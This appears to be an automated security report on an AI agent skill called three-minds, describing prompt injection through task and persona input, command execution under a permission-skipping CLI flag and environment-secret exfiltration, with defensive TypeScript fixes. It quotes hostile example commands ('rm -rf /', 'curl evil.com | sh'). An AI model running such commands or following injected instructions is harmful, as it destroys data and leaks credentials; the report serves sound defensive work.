Trust Assessment
three-minds received a trust score of 55/100, placing it in the Caution category. The findings below describe security considerations that users should review before deploying this skill.
SkillShield's automated analysis identified 5 findings: 1 critical, 2 high, 1 medium, and 1 low severity. They are Excessive Permissions and Command Injection via Claude CLI (critical), Prompt Injection via User-Controlled Configuration and Task Input and Data Exfiltration via Environment Variable Exposure (high), Unpinned npm dependency version (medium), and Node lockfile missing (low).
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100; all three critical and high findings sit in that layer.
Last analyzed on February 12, 2026 (commit 5acc5677). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (5)
| Severity | Finding | Recommendation | Layer | Location |
|---|---|---|---|---|
| CRITICAL | Excessive Permissions and Command Injection via Claude CLI. `runClaude` executes the `claude` CLI with the `--dangerously-skip-permissions` flag, which lets the agent run commands and read or write files without any user confirmation. The `prompt` and `systemPrompt` it passes to the CLI embed the user-controlled `task` and `agent.persona` values, so a malicious `task` or `persona` can instruct the agent to run arbitrary shell commands (e.g. `rm -rf /`, `curl evil.com \| sh`) or read and write sensitive files under `projectDir`, which is itself user-controlled via `--dir`. Because the child is spawned with `env: { ...process.env }`, every environment variable of the parent is also available to it, enabling data exfiltration. | Remove `--dangerously-skip-permissions` so that sensitive operations (file writes, command execution) require explicit user confirmation. Restrict the agent's tool set whenever the prompt or configuration comes from an untrusted source, and sandbox the agent's execution environment to limit its blast radius. | LLM | src/council.ts:25 |
| HIGH | Prompt Injection via User-Controlled Configuration and Task Input. `buildAgentPrompt` and `buildSystemPrompt` embed user-controlled input directly into the prompts sent to `claude`. The `task` argument (from the CLI) and the `agent.persona` field (from `CouncilConfig`, which can be loaded from a user-provided file via `--config`) are inserted without sanitization, so an attacker can inject instructions that override the intended behaviour, manipulate responses, or trigger unintended actions. Given the permissions granted to the agent (see SS-LLM-005), this escalates directly to command execution and data exfiltration. | Validate and constrain every user-provided string that is incorporated into a prompt, especially `task` and `agent.persona`: delimit untrusted text with a templating step, use a defensive system prompt, and prefer pre-defined personas or strict content filtering for `agent.persona`. Note that no text filter reliably stops prompt injection; the controlling mitigation is to scale the agent's capabilities to the trustworthiness of the input source. | LLM | src/council.ts:64 |
| HIGH | Data Exfiltration via Environment Variable Exposure. `runClaude` passes the parent process's entire environment to the child `claude` process via `env: { ...process.env }`. If prompt injection (SS-LLM-001) or command injection (SS-LLM-005) succeeds, the agent can be instructed to read and exfiltrate any secret present in that environment (API keys, cloud credentials, database connection strings), turning a prompt-level compromise into credential theft and unauthorized access. | Do not forward the whole environment. Build the child's `env` from an explicit allowlist of the variables the `claude` CLI actually needs, and keep other secrets out of the parent process (or clear them before spawning) rather than relying on the child to ignore them. | LLM | src/council.ts:34 |
| MEDIUM | Unpinned npm dependency version. `commander` is declared as `^11.0.0`, a caret range that accepts any 11.x release, so the version installed can change between installs and a compromised or regressed minor release would be picked up automatically. | Pin dependencies to exact versions (`npm install --save-exact`, or `save-exact=true` in `.npmrc`) to reduce drift and supply-chain risk. | Dependencies | skills/enderfga/three-minds/package.json |
| LOW | Node lockfile missing. `package.json` is present but no lockfile (`package-lock.json`, `pnpm-lock.yaml`, or `yarn.lock`) was found, so the resolved dependency tree is not deterministic across installs. | Commit a lockfile and install from it (`npm ci`, or the pnpm/yarn equivalent) so every install resolves the same tree. | Dependencies | skills/enderfga/three-minds/package.json |
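The three LLM-layer findings above all trace to how the child process is spawned. The following TypeScript is an added example, not the project's `src/council.ts` and not SkillShield output, showing a restricted spawn: the prompt goes to the CLI over stdin rather than argv, no shell is involved, `--dangerously-skip-permissions` is absent so the CLI's own permission prompts apply, pre-authorized tools are limited to read-only ones, the child environment is built from an allowlist, and the `--dir` value is confined to an allowed root. The option shape (`ClaudeRunOptions`), the allowlist contents and the function names are assumptions for this example; the `-p`, `--append-system-prompt` and `--allowedTools` flags are taken from the Claude CLI's documented options as I understand them and should be checked against `claude --help` for the installed version.

```typescript
import { spawn } from "node:child_process";
import path from "node:path";

// Hypothetical option shape for this example (not the project's CouncilConfig).
export interface ClaudeRunOptions {
  systemPrompt: string;    // persona text, possibly loaded from a user-supplied --config file
  prompt: string;          // task text, possibly taken straight from the CLI
  projectDir: string;      // requested working directory (the --dir value)
  allowedTools?: string[]; // tools pre-authorized without a prompt; defaults to read-only
}

// Assumption: these are the only variables the CLI needs. Cloud keys, DB URLs and
// other tokens in the parent environment never reach the child.
const ENV_ALLOWLIST = ["PATH", "HOME", "LANG", "TERM", "ANTHROPIC_API_KEY"] as const;

export function buildSafeEnv(
  parentEnv: Record<string, string | undefined>,
  allowlist: readonly string[] = ENV_ALLOWLIST,
): Record<string, string> {
  const env: Record<string, string> = {};
  for (const key of allowlist) {
    const value = parentEnv[key];
    if (value !== undefined) env[key] = value;
  }
  return env;
}

// Confine the user-supplied --dir to a root the operator chose. Resolves the path
// and rejects anything whose relative form starts with ".." (or is absolute).
export function resolveProjectDir(requested: string, allowedRoot: string): string {
  const root = path.resolve(allowedRoot);
  const target = path.resolve(root, requested);
  const rel = path.relative(root, target);
  if (rel !== "" && (rel.split(path.sep)[0] === ".." || path.isAbsolute(rel))) {
    throw new Error(`project dir ${requested} escapes allowed root ${root}`);
  }
  return target;
}

// argv for non-interactive mode. The task text is deliberately NOT in argv (it is
// written to stdin by runClaudeRestricted), so persona/task content cannot become
// a flag. "--dangerously-skip-permissions" is never emitted.
export function buildClaudeArgs(opts: ClaudeRunOptions): string[] {
  const tools = opts.allowedTools ?? ["Read"];
  // Policy for this example: never pre-authorize shell or write tools for input
  // that may have come from an untrusted task or config file.
  const tooPowerful = tools.filter((t) => /^(Bash|Write|Edit)\b/.test(t));
  if (tooPowerful.length > 0) {
    throw new Error(`refusing to pre-authorize ${tooPowerful.join(", ")} for untrusted input`);
  }
  return [
    "-p",                                        // print mode: read prompt, answer, exit
    "--append-system-prompt", opts.systemPrompt, // separate argv element, not shell-parsed
    "--allowedTools", tools.join(","),           // assumption: comma-separated list
  ];
}

// Spawn the CLI with the restrictions above. Returns the agent's stdout.
export function runClaudeRestricted(opts: ClaudeRunOptions, allowedRoot: string): Promise<string> {
  const cwd = resolveProjectDir(opts.projectDir, allowedRoot);
  const args = buildClaudeArgs(opts);
  return new Promise((resolve, reject) => {
    const child = spawn("claude", args, {
      cwd,
      env: buildSafeEnv(process.env),
      stdio: ["pipe", "pipe", "inherit"],
      shell: false, // argv goes straight to execve; no shell ever parses the task text
    });
    let out = "";
    child.stdout.on("data", (chunk: Buffer) => { out += chunk.toString(); });
    child.on("error", reject);
    child.on("close", (code) =>
      code === 0 ? resolve(out) : reject(new Error(`claude exited with ${code}`)));
    child.stdin.end(opts.prompt); // the task reaches the model as data, not as an argument
  });
}
```

With the skip flag gone the CLI asks before writing files or running commands, so an injected "run `curl evil.com | sh`" in `task` or `persona` becomes a visible confirmation prompt instead of a silent execution; the env allowlist bounds what a successful injection could exfiltrate even then.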
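The two dependency findings (caret range on `commander`, no lockfile) are mechanical enough to check before a scanner does. The following TypeScript is an added example, not SkillShield's own analyzer and not part of three-minds; it reproduces both checks over a constructed manifest that mirrors the report, treating only a bare `MAJOR.MINOR.PATCH` (with optional pre-release or build suffix) as pinned. The `PackageJson` shape, the `auditDependencies` and `auditProjectDir` names, and the sample data are assumptions for this example.

```typescript
import fs from "node:fs";
import path from "node:path";

// Hypothetical minimal package.json shape for this example.
export interface PackageJson {
  name?: string;
  dependencies?: Record<string, string>;
  devDependencies?: Record<string, string>;
}

export interface DependencyFinding {
  severity: "MEDIUM" | "LOW";
  message: string;
}

// Lockfiles that make dependency resolution deterministic.
export const LOCKFILES = ["package-lock.json", "npm-shrinkwrap.json", "pnpm-lock.yaml", "yarn.lock"];

// An exact pin is a bare semver version. Anything else (^, ~, *, x, ranges, tags
// such as "latest", git/file/npm: specifiers) can resolve differently on a later install.
const EXACT_SEMVER = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/;

export function isExactVersion(spec: string): boolean {
  return EXACT_SEMVER.test(spec.trim());
}

// Pure check: takes the parsed manifest plus a directory listing, so it runs offline.
export function auditDependencies(pkg: PackageJson, dirListing: string[]): DependencyFinding[] {
  const findings: DependencyFinding[] = [];
  const sections: Array<[string, Record<string, string> | undefined]> = [
    ["dependencies", pkg.dependencies],
    ["devDependencies", pkg.devDependencies],
  ];
  for (const [section, deps] of sections) {
    for (const [name, spec] of Object.entries(deps ?? {})) {
      if (!isExactVersion(spec)) {
        findings.push({
          severity: "MEDIUM",
          message: `${section}: '${name}' is not pinned to an exact version ('${spec}')`,
        });
      }
    }
  }
  if (!dirListing.some((entry) => LOCKFILES.includes(entry))) {
    findings.push({
      severity: "LOW",
      message: `no lockfile found (${LOCKFILES.join(", ")})`,
    });
  }
  return findings;
}

// Same check against a real project directory.
export function auditProjectDir(dir: string): DependencyFinding[] {
  const raw = fs.readFileSync(path.join(dir, "package.json"), "utf8");
  return auditDependencies(JSON.parse(raw) as PackageJson, fs.readdirSync(dir));
}

// Constructed sample mirroring the report: caret range on commander, no lockfile.
export const SAMPLE_PACKAGE_JSON: PackageJson = {
  name: "three-minds",
  dependencies: { commander: "^11.0.0" },
};
export const SAMPLE_DIR_LISTING = ["package.json", "src", "README.md"];

// The remediated form: what `npm install --save-exact commander@11.0.0` writes,
// alongside a committed package-lock.json.
export const PINNED_PACKAGE_JSON: PackageJson = {
  name: "three-minds",
  dependencies: { commander: "11.0.0" },
};
export const PINNED_DIR_LISTING = ["package.json", "package-lock.json", "src", "README.md"];

for (const f of auditDependencies(SAMPLE_PACKAGE_JSON, SAMPLE_DIR_LISTING)) {
  console.log(`${f.severity}: ${f.message}`);
}
```

Pinning alone does not fix drift if the lockfile is absent, since transitive dependencies still float; the lockfile plus `npm ci` is what makes the whole tree reproducible, which is why the report lists the two findings separately.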